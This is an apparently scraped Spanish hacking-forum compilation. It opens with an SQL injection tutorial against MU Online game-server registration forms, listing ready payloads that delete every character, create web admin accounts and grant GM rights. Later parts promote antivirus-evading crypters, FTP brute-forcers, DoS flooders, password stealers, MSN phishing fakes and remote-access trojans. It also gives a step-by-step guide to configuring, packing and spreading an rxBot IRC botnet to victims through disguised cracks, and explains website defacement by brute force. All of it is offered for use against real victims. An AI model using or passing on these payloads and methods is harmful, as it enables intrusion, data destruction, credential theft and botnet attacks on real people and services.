Wenas les traigo el tutorial de la inyeccion SQL esta sirve para editarte en un servidor o y sea borrar todas las cuentas (TUMBARLO) Tenemos que descargar el Tamper Data obligatoriamente tienen que usar firefox, lo descargan de aqui Firefox: http://www.mozilla-europe.org/es/firefox/ y el Tamper Data de aca: https://addons.mozilla.org/es-ES/firefox/addon/966/
una vez que los tengamos hacemos lo siguiente:
1- Vamos a la Pagina web del Mu que estemos Jugando.
2- Vamos a la seccion de Registro. Ejemplo: http://www.paginadelmu.com/index.php?op=register
3- Llenamos todos los Campos de Registro.
4- Una ves instalado el Tamper data , Vamos a Herramientas >> Tamper Data >>> Comenzar Modificacion
5- Ahora precionamos Enviar en el formulario de Registro , Y Nos Saldra un Cartel Diciendo Modificar , Enviar , Abortar Peticion
6- Precionamos en Modificar , Buscamos donde Dice Username o Account y Colocamos la Injeccion SQL que queremos hacer.
7- Listo , Colocamos enviar y Luego Abortar Peticion
Codigos Injecciones:
Colocarte 200 Resets a tu Personaje 'x'; update character set resets = 200 where name = 'NOMBREDETUPJ'
Eliminar todos los Personajes del Server 'x' ; delete character
Cambiar de Raza tu Personaje 'x'; update character set class = 64 where name = 'NOMBREDETUPJ'
Desconectar todos los Personajes del Server 'x'; UPDATE MEMB_STAT SET ConnectStat='0' WHERE ConnectStat='1'
Full Stats tu Personaje 'x'; update character set strength=32767,dexterity=32767,energy=32767,vitali ty=32767,leadership=32767 where name = 'Kenya'
Colocar tu Personaje Level 400 'x'; update character set clevel=400 where name = 'NOMBREDETUPJ'
Copiar Vault de Otro Personaje 'x' ; UPDATE warehouse SET Items = (select items from warehouse where accountid = (select accountid from character where name = 'nombrepjacopiarbaul')) WHERE AccountID = 'nombredetucuenta'
Dejar Personaje Normal 'x'; update character set ctlcode = 0 where name = 'NOMBREDETUPJ'
Banear Personaje 'x'; update character set ctlcode = 1 where name = 'NOMBREDETUPJ'
Hacer GM tu Personaje 'x'; update character set ctlcode = 8 where name = 'NOMBREDETUPJ'
Colocarte LevelUP Points 'x'; update character set leveluppoints = 432 where name = 'NOMBREDETUPJ'
Codigo Items En tu Inventario 'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB27F0570000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB67F0580000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB77F0590000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB37F05A0000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB47F05B0000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x0EEFFF00002FB57F0500000000000000 WHERE AccountID = 'mastercito'
----------------------------------------- ANUBIS ------------------------------------------------------- 'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FC2000570000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FC4000580000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x03EFFF00002CC30F0590000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FC50005A0000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FF50F05B0000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x15EFFF0000FFC60005D0000000000000 WHERE AccountID = 'mastercito' ----------------------------------------- BLESS -------------------------------------------------------- 'x' ; UPDATE warehouse SET Items = 0x0DEFFF0000FFC60001E0000000000000 WHERE AccountID = 'mastercito' ----------------------------------------- Sun ---------------------------------------------------------- 'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B07F0078000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B17F0088000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B27F0098000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B37F00A8000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B47F00B8000000000000 WHERE AccountID = 'mastercito' ----------------------------------------- Ashcrow ------------------------------------------------------ 'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB37F0070000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB47F0080000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB57F0090000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB67F00A0000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB77F00B0000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB87F0000000000000000 WHERE AccountID = 'mastercito' --------------------------------------------- RING ----------------------------------------------------- 'x' ; UPDATE warehouse SET Items = 0x15EFFF0000C1C67F00D0000000000000 WHERE AccountID = 'mastercito' 'x' ; UPDATE warehouse SET Items = 0x1CEFFF0000DFB27F00D0000000000000 WHERE AccountID = 'Bakura'
Eliminar Guild 'x' ; Delete Guild
Cambiar Inventario 'x'; update character set inventory = 0x where name = 'NOMBREDETUPJ'
Cambiar Codigo de Administracion Web 'x'; INSERT INTO MuWeb_admin(username,password,securitycode)VALUES( 'MUAdmin','123123','0123')
ZEN Para tu PJ 'x'; update character set money=2000000000 where name = 'NOMBREDETUPJ'
Hacer Full stats a tu Personaje 'x'; update character set strength=65000,dexterity=65000,energy=65000,vitali ty=65000,leadership=65000 where name = 'NOMBREDETUPJ'
Darkcrypt es un crypter tiene opcion para ingles (lo digo por la imagen) actualmente no es detectado por NOD32 y otros antivirus comunes, la utilización es simple, dejan las opciones tal como aparecen en la imagen y clickan en el boton derecho de abajo para encriptar, el programa creara un backup del programa encriptado en un nuevo archivo algo asi “server [backup].exe” mientras el que mantenga el nombre original sera el archivo ya encriptado y no detectado por los antivirus, perfecto para encriptar troyanos y virus y que esos no sean detectados por los antivirus mas comunes.
NsPack – comprimir de 32 bits y 64bits exe, dll, ocx, scr ventanas de programa
El norte de inicio para comprimir las ventanas es un maravilloso programa que es superior a otros softwares, como Aspack, upx, etc
El programa puede comprimir de 32 bits y 64bits exe, dll, ocx, scr ventanas de programa, así como C #. Netos programa.
NsPack es un software que permite comprimir los ejecutables.
Este software es diferente de los compresores de archivos comunes. Si queremos comprimir un programa utilizando un compresor de archivos comunes, no podemos ejecutar el programa directamente para
Tenemos que descomprimirlo en primer lugar. Sin embargo, al empezar a comprimir nuestro norte es utilizado, el programa se puede ejecutar directamente después comprimido por el compresor.
Si se produce un programa, el programa es muy fácil de modificar por herramientas como depurador.
Cuando el programa está comprimido por el compresor, si alguien quiere modificar el mismo, debe tickly la concha en primer lugar. Además, es conveniente publicar en un programa de pequeño tamaño que más y más software producciones se publican en forma de comprimidos.
Sencillo ftp cracker y efectivo para hackear webs que no tengan protecciones contra este tipo de ataques de fuerza bruta (brute force). FTP Cracker creado por command tribulation, uno de los mejores grupos de defacers.
January 20th, 2008
Categories: Crackers | Autor: admin | Comments: Comments Off |
MessenPass, una aplicación capaz de localizar el nombre de usuario y la contraseña de todos aquellos que iniciaron sesión en el equipo.
Los clientes de mensajería que soporta MessenPass son los siguientes: MSN Messenger, Windows Messenger, Windows Live Messenger, Yahoo Messenger (en versiones 5.x y 6.x), ICQ Lite 4.x/2003, AOL Instant Messenger, (aunque sólo antiguas versiones), Netscape 7; Trillian; Miranda y GAIM/Pidgin.
MessenPass no necesita instalación y su uso es sencillo, ya que en la pantalla inicial muestra los usuarios y las contraseñas, aunque tiene problemas para recuperar información de Trillian, Netscape, AIM, GAIM y Miranda.
Para resolverlo, puedes ir al menú ’archivo’, pinchar en selección de fuentes (select folders) y buscarlo manualmente en tu PC. También puedes copiar, pegar o guardar las cuentas que desees en el bloc de notas y en otras aplicaciones.
Famoso Crackeador de contraseñas, por su gran sencillez, eficacia, y facilidad de uso.
Puede crackear la password desde un archivo o usando la fuerza bruta.
Puede crackear passwords de todo tipo como HTTP (Basic Auth), FTP (File Transfer Protocol), HTTP (Form), FTP, Telnet, SMB (NetBIOS).
October 3rd, 2007
Categories: Crackers | Autor: admin | Comments: Comments Off |
Turbinas by volks es un programa algo viejito (2006) utilizado para tirar servidores. Con este programita pude tirar servers de varios juegos online, como mu online, counter strike 1.6, ragnrok, algunas webs pequeñas, etc (todo a modo de prueba,)..
Se preguntaran que tipo de servidores pueden tirar, bueno pensando un poco se daran cuenta que depende de la conexion de internet del atacante y de la victima, de que tipo de server se trate, de las protecciones, etc. No vallan a querer intentar tirar google, ni servidores grandes, que no le haran ni cosquillas.
Como funciona?
Forma Técnica:
“Es un programa que conecta y desconecta sockets, en un milisegundo conecta y desconecta, osea que 1000 milisegundos = 1 segundo multiplicado por 5, genera 5.000 conexiones por segundo al servidor , lo cual hace que el mismo colapse.”
Forma no técnica:
“Suponga que hay una puerta grande (10MB de host de un servidor), y que 5.000 personas quieren entrar y salir en un segundo, entonces al no poder colapsa el servidor.”
Como se usa?
Facil, tienen que seleccionar el IP, y el puerto, Y ir activando las turbinas (tambien pueden seleccionar el intervalo cuanto menos intervalo mas rapido conectaran y conectaran (esta puesto en 100 milisegundos).
Si elijen cualquier IP y cualquier Servidor, no les dara error ya que esta compilado con “Error resume Next” de Visual basic, para que no den errores de overflow para los sockets.
February 17th, 2008
Categories: DoS | Autor: admin | Comments: Comments Off |
Es un programa de envío masivo de paquetes a una IP de un servidor o de un único usuario,dinámica o estática.El envío de estos paquetes es con el fin de colapsar la máquina remota xD
Nota: Si tu antivirus salta es normal, ya que lo detectará como nuker o como DoS flooder…
Bot para infectar a gente como un troyano y crear una botnet, con una botnet puedes hacer de todo, desde hacer perder dinero ha empresas,joder servicios,espiar por la webcam a los bots, spammear con los bots, usar los bots como proxy, ataques DDoS, Doosear IP’s, información completa acerca del bot infectado, borrar archivos,renombrar archivos, descargar archivos de internet al ordenador del bot….
Bueno, yo no sé si eso lo hará otro troyano, yo hablo del mio, mi botnet está montada por mi troyano pero el RxBot tiene las mismas funciones.
Claro, para montar una botnet necesitas usar algún script como mIRC
y conectar a un servidor irc, ejem: irc-hispano.org y un canal: #botijuelos
January 31st, 2008
Categories: DoS | Autor: admin | Comments: Comments Off |
Explicación hecha por RaKi0N, Manual hecho por xXDarkXx:
¿Qué es una botnet?
Una botnet es una red normalmente organizada por “hackers” para cometer fraudes en internet, como ataques DoS o DDoS.
¿Cómo actúan?
Estos bots son manejados por humanos a la vez que se manejan por IRC con comandos y actuan de forma semiautónoma, estos bots son personas que en su equipo se ha infectado por un “Troyano” capaz de convertir su máquina en un uso para el hacker que diseñó la botnet
¿Qué tipos de botnet hay?
-Están las botnet serias, que catalogamos que lo usan para tirar páginas con contenido erótico, o usadas por hackers para beneficio propio
-Están las botnet para los lammers, si si, aquellos que las usan para joder y reirse de otros diciendo “tengo botnet” y con ello viven feliz.
¿Qué tipos de troyanos hay para crear botnet?
Troyanos están:
-Rxbot, que es el cual con el que está hecho este manual
-RvBot (no lo he probado pero bueno)
-AgoBot otro bot totalmente la hostia, si si, la hostia
Y muchos más bots que con su compilación podemos hacer la botnet.
1. INTRODUCCIÓN
Este documento ha sido escrito en términos de ayuda para las personas que empiezan a manipular los rbots , urxbots, y demás derivados. Se explicará la manera de compilarlos, configurarlos, infectar, y si posees conocimientos de c++, puedes agregarles más funciones.
Para fines de este artículo se va a usar un código llamado xBot.
2. REQUISITOS
· Necesitas tener instalado la versión del visual c++ 6.0 en inglés (recomendado).
· Instalar el Service Pack 6 para el Visual C++ 6.0.
· Instalar PSDK-x86
· El código del xBot:
Código:
· El themida
· Ganas y atención J
3. PREPARANDO NUESTRO VISUAL C++ 6.0
Ahora empezamos con lo que nos interesa, vamos a seguir los pasos siguientes:
1. Instalar el Visual C++ 6.0
2. Instalar el Service Pack 6 para el Visual C++ 6.0, que se encuentra en la carpeta Vs6sp6 y PSDK-x86 y se llama Vs6sp6. [Lo descomprimimos en una carpeta que puede ser c:vs6sp6 y luego dentro de la misma ejecutamos el setupsp6 de instalación.]
3. Luego instalar el PSDK-x86, que también está incluido en la carpeta Vs6sp6 y PSDK-x86 y se llama PSDK-x86. [Esto toma un cierto tiempo digamos unos 30 minutos dependiendo de tu conexión a Internet].
4. Ahora vamos a configurar el Visual C++ 6.0 para compilar el xBot:
· Abrimos el Visual C++ 6.0 y nos vamos a la pestaña: Tools —> Options
5. En la parte de Options, nos vamos a la pestaña Directories y hacemos clic donde indica la flechita.
6. Luego miramos en la parte de Show directories for: Incluye Files (Y para qué?. Pues ahi no solo dice Include Files sino también Library Files, Source Files y debemos configurar para esos 3 directorios el PDSK) y al abrirse la nueva ventana le damos clic en los … para buscar la carpeta INCLUDE que instalo PSDK-x86. En mi caso se encuentra en C:Archivos de programaMicrosoft Platform SDKInclude y pulsamos OK.
7. Ahora debemos colocar el C:Archivos de programaMicrosoft Platform SDKInclude, en la primera línea usando las flechitas y debe quedarnos asi:
8. Hasta ahí solo hemos configurado la parte de Include files, se necesita hacer lo mismo para Library files y luego para Source files.
Se hace de la misma manera que Includes Files en este caso se tendrá que seleccionar Library files y buscar la ruta y luego colocarla en la primera línea lo mismo para Source files.
Executable files no se toca.
· Para Library files la ruta en mi caso fue:
C:ARCHIVOS DE PROGRAMAMICROSOFT PLATFORM SDKLIB
· Para Source files la ruta fue:
C:ARCHIVOS DE PROGRAMAMICROSOFT PLATFORM SDKSRC
Y luego OK
Luego de hacer esos 8 pasos tan detallados, es hora de compilar el xBot y configurarlo.
4. COMPILANDO Y CONFIGURANDO EL XBOT
En esta parte, se verá la manera de abrir el xBot y luego trabajar con la configuración.
4.1 Abriendo un Workspace
Abre el Visual C++ 6.0 y sigue el gráfico: Clic en File à Open Workspace
4.3 Compilando:
Ahora luego de cargar el proyecto, vamos a la pestaña Build à Rebuild All
4.4 Verificando errores
Si por algún motivo tienes errores, verifica los pasos anteriores de configuración del visual c++ 6.0 con el sp6 o el PSKD-x86
Ya tenemos todo casi listo pero nos falta saber dónde se guarda el ejecutable que acabamos de construir.
4.5 Buscando el Ejecutable
Por defecto el ejecutable que construimos se encuentra en la carpeta Release (No Ejecutarlo)
Ahora que ya tenemos los conocimientos de cómo configurar el visual c++ 6.0, de construir el ejecutable del xBot, es hora se configurarlo y explicar un poco en qué consiste.
4.6 Configurando el xBot a un determinado servidor y Canal de IRC
Esta es la parte principal de nuestro xBot y vamos a explicar como configurar:
· Lo primero es ir a la carpeta Header’s y luego al archivo configs.h, haciendo doble clic.
· En la parte derecha vemos lo siguiente:
…
…
char botid[] = “”; // bot id
char version[] = “”; // Bots !version reply
char password[] = “”; // bot password
char server[] = “”; // serverchar serve
rpass[] = “”; // server password
char channel[] = “”; // channel that the bot should join
char chanpass[] = “”; // channel password
char server2[] = “”; // backup server (optional)
char channel2[] = “”; // backup channel (optional)
char chanpass2[] = “”; // backup channel password (optional)
char filename[] = “bling.exe”; // NO CAMBIAR ESTO
char keylogfile[] = “”; // keylog filename
char valuename[] = “”; // value name for autostart
char nickconst[] = “”; // first part to the bot’s nick
char szLocalPayloadFile[]=”"; // Payload filename
char modeonconn[] = “”; // Can be more than one mode and contain both + and -
char exploitchan[] = “”; // Channel where exploit messages get redirected
char keylogchan[] = “”; // Channel where keylog messages get redirected
char psniffchan[] = “”;
…
…
Aquí es donde vamos a configurar:
Botid[] = “rbot” ; ß Sin comentarios
Version[]= “2006”; ß Sin comentarios
Password[]= “peruvianrlz”;
· Esto sirve para que cuando este en el canal lo pueda llamar asi: .login peruvianrlz [Esto es la manera de llamar a la máquina zombie en el canal de irc. La documentación de uso del xBot esta en la carpeta DOCUMENTOS]
Server[]=”irc.loquerias”;
· Aca estoy diciendole al bot a que servidor debería entrar cuando sea ejecutado por la víctima.
Serverpass[]=”clave_del_server”;
· Si el servidor posee una contraseña aca le colocamos.
Channel[]=”#peru”;
· Aca especificamos el canal a donde se ira la maquina que ejecute el xbot
Channelpass[]=”clave_del_canal”;
· Lógicamente especificamos la clave del canal si este posee una
…
Veamos un ejemplo de cómo debe queda configurado:
char botid[] = “DiE”; // bot id
char version[] = “[rxBot v0.6.6a "; // Bots !version reply
char password[] = “fucku”; // bot password
char server[] = “irc.server.net”; // server
char serverpass[] = “”; // server password
char channel[] = “#peruvian”; // channel that the bot should join
char chanpass[] = “”; // channel password
char server2[] = “”; // backup server (optional)
char channel2[] = “”; // backup channel (optional)
char chanpass2[] = “”; // backup channel password (optional)
char filename[] = “bling.exe”; // NO CAMBIAR ESTO
char keylogfile[] = “system.txt”; // keylog filename
char valuename[] = “Microsoft Update Machine”; // value name for autostart
char nickconst[] = “[Rlz]-”; // first part to the bot’s nick
char szLocalPayloadFile[]=”msconfig.dat”; // Payload filename
char modeonconn[] = “+n+U”; // Can be more than one mode and contain both + and -char exploit
chan[] = “#peruvian “; // Channel where exploit messages get redirected
char keylogchan[] = “#peruvian “; // Channel where keylog messages get redirected
char psniffchan[] = “#peruvian “;
Ahora que ya configuramos el configs.h , podemos construir el ejecutable Build à Rebuild All
5. PROTEGIENDO NUESTRO XBOT DE LOS ANTIVIRUS
Ahora que ya tenemos nuestro ejecutable debemos hacerlo indetectable ante los antivirus y una herramienta que me está dando resultados es: THEMIDA
Hacemos clic donde nos indica la flecha y buscamos nuestro ejecutable, que se encuentra en la carpeta Release y luego le damos clic en el candadito que dice Protect
Cerramos el Themida y ya tenemos nuestro xBot protegido contra las búsquedas heuríticas de algunos antivirus.
6. INFECTANDO Y BUSCANDO VÍCTIMAS
Siempre en este mundo de tecnologías y muchas computadoras existe algo que se llama ingenio, es por eso que daré algunos consejos antes de empezar a infectar.
· Ya tienes todo listo para darle a algún amigo el ejecutable y que este lo ejecute en su computador.
· Es necesario que entiendas algunas cosas como por ejemplo char server[] = “irc.server.net”;, todas las máquinas que ejecuten su código siempre irán a ese servidor, pero que sucedería si ese servidor cierra?, se perderán todas tus rbots (máquinas infectadas).
· Para eso es necesario no colocar el nombre de un servidor en especial sino de un DNS ejemplo: peru.dns.com. y ¿por qué?
· Pues porque con un dns (http://www.cdmon.com/) , vas a tener localizados a todos tus bots. Ejemplo: si quieres meter tus bots a un servidor: irc.server3.net, lo único que tendrías que hacer es ir a tu cliente dns y ponerle el ip del servidor de irc y automáticamente tus bots se van a meter al servidor irc.server3.net y luego al canal que configuraste en tu xBot, ejemplo #peruvian.
· Las formas de infección son de acuerdo al ingenio que poseas, una forma es camuflando el rbot con otros ejecutables como x ejemplo con un instalador, con un crack de algún programa y compartirlo por el emule, etc.
· Otra forma es crear un virus que se reprodusca por p2p y agarre el codigo de tu rbot dentro del mismo J
· Lo demás va por cuenta tuya.
7. ANALIZANDO UN XBOT
Junto al artículo puse un video de cómo un conjunto de computadoras en un determinado servidor y canal de IRC, hacen el llamado flood a una página importante del Perú (www.reniec.gob.pe)
La documentación de los comandos del xBot, va incluidos junto al artículo y explicados detenidamente su uso.
Hasta el momento se dio el primer paso para que empiecen a manipular los rBots y jugar un poco con ellos. Espero que este pequeño y detallado tutorial como primera parte les sirva a muchos. No olviden que la documentación de el xBot tiene todos los comandos a usar en el irc.
Otra cosa muy importante si tienes conocimientos de C++, puedes leer las referencias bibliográficas que te ayudarán mucho a entender el código y poder modificarlo a tu gusto.
Espero poder continuar con el segundo tutorial y de la misma manera que los xBots explicarles detalladamente el proceso de configuración, compilación e infección.
Este manual no ha sido creado por RaKi0N.
Posteé este manual para todo aquel que quiera aprender y aportar
La fragmentación de paquetes TCP Syn-ataque. Puede detener por completo en Win2k Sistemas de Redes locales, Firewalls dont asunto. Colores personalizables de amOkk – Consola GUI. Añadido por Radost
Con este programa podras hacer ataques de D.o.S al protocolo UDP, muy efectivo. Podras tirar servidores que no esten protegidos contra este tipo de ataques y dejarlos sin conexión.
Patea a tus contactos del msn con esta gran utilidad muy sencilla.
1) primero desactiva “mostrar iconos gestuales” en tus Opciones del messenger
2) Abre solo la ventana de conversación de tu victima. Cierra las demás ventanas
3) Pulsa el siguiente boton para patear a tu contacto (Kick Now!)
y así, Facilmente!, tu contacto sera expulsado del msn.
este programa lo puedes convinar con Ice Cold reloaded, y tendras un convinado muy bueno.
Ghost msn es un fake avanzado para msn. Con la caracteristica especial que permite enviar las contraseñas de msn a un servidor FTP.
Cuando la victima abra el fake le saldra un error diciendo que no se cargaron las opciones (ustedes pueden configurar este mensaje a su gusto). Entonces cuando la victima se conecte con su id de passport su contraseña sera enviada a nuestro servidor ftp.
Con el GhostMSN Builder creamos el fake del live msn, para ello debemos colocar nuestro servidor ftp usuario y pasword (se pueden crear una cuenta en miarroba.com o en www.ueuo.com)
Es la primera version de este fake, por lo que puede tener errores, yo ya encontre algunos.
Para que la victima caiga hay que saber utilizar un pokito la cabeza, o bien adjuntar el fake a un archivo batch que reemplaze el msn “original” por el fake.
MSN Nightmare es una pequeña aplicación que te permite interceptar remotamente todo lo que se envía o recibe del MSN Messenger e incluso intervenir en medio de una conversación suplantando el PC en el que está instalado. Cómo utiliza técnicas de inyección jamás es detectado por ningún antivirus ni firewall.
Características:
* Espiar conversaciones de MSN Messenger
* Intervenir en una conversación suplantando al PC remoto
* Evitar recepción y envió de mensajes
* Recuperación de passwords del Messenger (en el registro y por keylogger)
* Explorar/Ejecutar/Eliminar/Subir/Descargar archivos remotos
* Desinstalar remotamente
* Shell Inversa
* Pequeña utilidad para comprobar si tienes los puertos del router abiertos
* Función subir Log de conversaciones y passwords a ftp para no tener que abrir puertos
* Conexión sin necesidad de determinar IPS
Universal 1337 es un capturador de contraseñas de todo tipo, puede enviar los datos a un servidor ftp o a una cuenta de mail.
El server es bastante detectado y pesado (1.6Mb), pero incluye opciones para eliminar firewall y antivirus, tambien incluye un downloader.
Y se lo puede encriptar facilmente sin romper el server con cualquier encriptador.
Tambien permite cambiar el icono del server, mostrar mensaje al ejecutarse, cambiar la extension del server etc.
Recomiendo crearse una cuenta ftp o de email exclusiva para este programa.
Algunos de los password que captura:
Steam
Produkt Keys
Network Passes
Paypal
Ebay
AIM
ICQ
Miranda
Trillian
MSN Messenger
AOL Instant Messenger
Windows Messenger (In Windows XP und Vista)
Windows Live Messenger (In Windows XP und Vista)
Yahoo Messenger
Google Talk
GAIM (Pidgin)
Windows Mail
Outlook Express
Microsoft Outlook
IncrediMail
Eudora
Netscape
Mozilla Firefox
Internet Explorer
Group Mail Free
PC Infos
Ya salio el troyano shark 3, exactamente compilado el 17-1-2008 en VB.
Este troyano tal vez sea el sucesor del bifrost y del poison ivy debido a su gran estabilidad, velocidad, ocultación, calidad y cantidad de herramientas, ademas de muchas características innovadoras no incluidas en ningún troyano. A continuación les dejo muchas de las características escritas por mi, supongo que debe tener errores pero es lo que hay.
Caracteristicas:
-mRC4 Encriptacion de trafico
-zLib Compresion de Trafico
-Instalacion por defecto, incluye 7 opciones
-Pasword de conexion
-Permite seleccionar el intervalo de tiempo para la conexion del server
-keylogger, con caracteristica highlight, permite seleccionar maximo de tamaño del log, permite buscar.
-Testear los host
-Nombres de instalacion y extensiones aleatorias
-HKML startup
-Reg-HKU startup
-Eventos al ejecutar el server, (ejecutar archivo o abrir pagina web)
-Incluye un binder completo en la creacion del server, asi que olvidensen de andar buscando binders, joiners, etc.
-Blacklist, permite matar, frezar, cerrar, etc un proceso o parar, pausar, cerrar, etc un servicio
-Antidebugging, incluye maquina virtuales como VMWare, virtualBOX, etc
-Metodos de ocultacion, muy buenos.
-Firewal by pass
-Opciones avanzadas, claves del stuff aleatorias, compresion, tolerancia… etc
-Sumario final
-Comprimir con UPX
-Cargar y guardar configuracion
-Configuracion del server
-Blacklist
-Noticias
-Informacion del sistema
-Aplicaciones instaladas
-CD keys
-Autostart manager
-Administrador de procesos
-Administrador de servicios
-Administrador de archivos
-Editor de registro
-Administrador de ventanas
-Busqueda de archivos
-Puertos abiertos
-Redireccion de DNS
-Opciones de suspencion, apagar el sistema, reiniciar, suspender monitor, suspender administrador de tareas, etc
-Captura de pantalla, rapida, con muchas opciones, permite utilizar el teclado y el mouse en la pc victima
-Captura de la webcam
-Captura de audio
-Shell remota
-Web Downloader
-Ejecucion de memoria
-Chat con la victima
-Imprimir en la pc victima
-Vistas de escritorios en miniaturas
Y muchisimo mas
El poison, se trata de un troyano de conexion inversa. Esta compuesto de dos partes; un cliente.exe que es mediante el cual creamos el server, y una vez creado, tendremos un server.exe que es el que tendremos que enviar a nuestras victimas para que lo ejecuten, y poder controlar remotamente su pc.
Como hackear webs de gratishost aqui un pequeño manual.
- – - – Defacear Gratishost – - – -
Defacear webs en gratishost es extramadamente sencillo,no hace falta saber mucho para hackearlas,solamente se necesita un poco de paciencia y las herramientas adecuadas
Y pongo este metodo en especial para mofarme aun mas de estos tipos,ya que menospreciaron el metodo de crackeo por fuerza bruta y ya ven lo que les paso xD.
1.-Primero necesitamos sacar el nombre de usuario ,para esto simplemente basta con provocar un error en la pagina en este caso como tenian un script en php que daba la ip del visitante,entonces basta usar el achilles para falsear nuestra ip ,para configurar el achilles tenemos que poner nuestro navegador para que use proxy con la direccion 127.0.0.1 y el puerto 5000
Cuando veamos que sale el script que pide la ip ponemos algo como esto *? $ipfalsa ?* (substituye * por < y >)de esa forma lograremos ejecutar un error en el script,y para que es esto?? pues para obtener el preciado nombre de usuario
Parse error: parse error, unexpected T_FOR, expecting ‘,’ or ‘;’ in /home/virtual/sitio19239/www/index.php on line 8
Perfecto ahora ya tenemos la ruta y por lo tanto el nombre de usuario es admin19239 (solo hay que cambiar la palabra sitio por admin)
Ahora solo nos falta la contraseña y estaremos dentro Sonrisa,ahora es cuando agradecemos a gratishost que solamente permita contraseñas maximo de 7 caracteres
2.-Ponemos a funcionar el FTP Cracker (o cualquiera que tengas a la mano,el brutus si quieres jajaj) configuramos de la siguiente forma
Nota. Si quieres podes usar el FTP Cracker.
Y gracias a que solo tenemos que buscar el rango de 4 a 7 caracteres el password sale bastante rapido a mi me llevo alrededor de 4 horas,con un password de 6 caracteres,si tienes paciencia con 1 dia maximo sacas la contraseña
El siguiente paso simplemente fue verificar que la contraseña del ftp era la misma que la redireccion de .tk (vaya imbeciles) y con esto lograomos el objetivo.
Bueno aki les dejo un manual de muxa utilidad. extraido de Foro pOrtal Hacker
COMO HACKEAR PÁGINAS WEB por Philber
Bien.. seguro que este es uno de los puntos que más interesa a los hackers novatillos…
Ante la falta de documentos de este tipo en castellano, he decidido crear este yo mismo.
No voy a explicar todas las técnicas que se pueden usar para conseguirlo.
Las técnicas son infinitas. Por cada agujero posible en un sistema, hay una técnica. Solo
es necesario encontrar la adecuada. Antes que nada debemos inspeccionar el lugar que vamos
a “visitar”. Debemos buscar todos los posibles accesos al sistema… (telnet, ftp, etc…)
COGIENDO EL FICHERO DEL PASSWORD A TRAVES DE FTP
Ok, bien… Una de las formas más facil de conseguir ser “superusuario” en el sistema es
accediendo a traves de ftp anónimoal fichero “passwd”. Primero necesitas conocer algo sobre
los ficheros password:
Este es otro ejemplo de un fichero password, solo que este tiene una pequeña diferencia
este está controlado. Los password controlados no te dejan ver o copiar el actual password
encriptado . Esto causa problemas para el Cracker y el diccionario que uses (después se explica).
Losiguiente es otro ejemplo de otro password controlado:
etc…
los password controlados tienen un “*” o “x” en el lugar donde va el password.
Ahora que tu conoces un poco más acerca de como identificar un password encriptado de un
password controlado, podemos hablar de como crackearlo.
Cracker un password no es tan complicado como parece. Los archivos varían de sistema a sistema.
Debemos antes que nada, de hacernos con el fichero passwd.
Bajatelo a tu disco duro. Una vez lo tengas en tu disco duro necesitas un cracker y un
diccionario. Puedes usar el Cracker Jack, John the ripper (aconsejado), jack the ripper,
brute force cracker…. Los puedes encontrar en cualquier página de hacking, incluido la mía. http://www.redestb.es/personal/lcd
Cuando ejecutes el cracker, deberas indicar cual es el fichero passwd. Hay muchos sistemas para
buscar el passwd. Aqui es donde actua el diccionario. Un diccionario encuentra todas
las posibles combinaciones posibles con el alfabeto que uses, incluyendo toda clase de
caracteres “raros”. Lo normal es que tenga predefinido miles de palabras posibles.
Si este método no funciona se hace un rastreo completo, probando todas las combinaciones
posibles desde 1 caracter hasta el total permitido. Asi SIEMPRE lo encuentra, aunque el
problema está en que tarda mucho. Una vez tengas el password, YA ESTA!!!
tendrás acceso a todo el sistema.
TECNICA PHF
la tecnica del phf es una de la más vieja (y que menos suele funcionar,tambien hay que decirlo)
de conseguir un password. Es Imprescindible probarla siempre. (por probar que no quede…)
ya que no cuesta nada y aveces se encuentra a alguna víctima que cae.
Todo lo que debes hacer es abrir tu “notescapes navegando” y escribir lo siguiente:
reemplaza www.web_a_hackear.es por el dominio.
y ya está!. acontinuación se empezará a transmitir una linda copia del fichero con
los password (si funciona, claro está.
REDES LOCALES
Otro sistema es buscar la direccion IP del dominio a hackear. Todas las máquinas conectadas
a la red tienen una dirección IP. por ejemplo: www.probando.com
debemos averiguar el IP de este servidor. (no me jodas con que no sabes como).
hay miles, no, millones de programitas que te lo dicen.
(hasta con el 7thsphere port fuck que viene con el sript de irc de mismo nombre, te lo dice)
suponiendo que fuese:
194.179.23.100
esto es la dirección IP de la máquina central. Tal vez inaccesible, pero si tiene una red local
conectada a esta.. (ordenador del diseñador, del director… que se yo!)
las máquinas de la red tendrán un IP muy parecido. Sabes lo que puede pasar si en tu
navegador escribes lo siguiente?:
194.179.23.101 o 194.179.23.102 … etc…
que accederás a los ordenadores que estén en esa red local (siempre y cuando sean tan capullos
de no protegerlos porque no están cara al público!)
curioso ¿no?
DIRECTORIOS OCULTOS
